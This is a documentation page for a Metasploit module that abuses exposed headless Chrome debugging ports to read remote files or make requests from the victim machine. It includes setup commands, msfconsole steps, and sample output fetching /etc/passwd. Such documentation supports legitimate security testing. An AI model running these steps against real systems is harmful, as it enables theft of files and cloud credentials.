rapid7/metasploit-framework

View on GitHub
documentation/modules/auxiliary/gather/chrome_debugger.md

Summary

Maintainability
Test Coverage
## Vulnerable Application

This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.

This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.

A vulnerable Headless Chrome session can be started with the following command:

```
$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
```

This will start a webserver running on port 9222 for all network interfaces.

## Verification Steps

1. Start `msfconsole`
2. Execute `auxiliary/gather/chrome_debugger`
3. Execute `set RHOST $REMOTE_ADDRESS`
4. Execute `set RPORT 9222`
5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
6. Execute `run`

## Options

**FILEPATH**

The file path on the remote you wish to retrieve.

**URL**

A URL you wish to fetch the contents of from the remote machine.

**Note:** One or the other must be set!

## Scenarios

```
[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
[*] Opened connection
[*] Attempting to load url file:///etc/passwd
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Retrieved resource
[*] Auxiliary module execution completed
```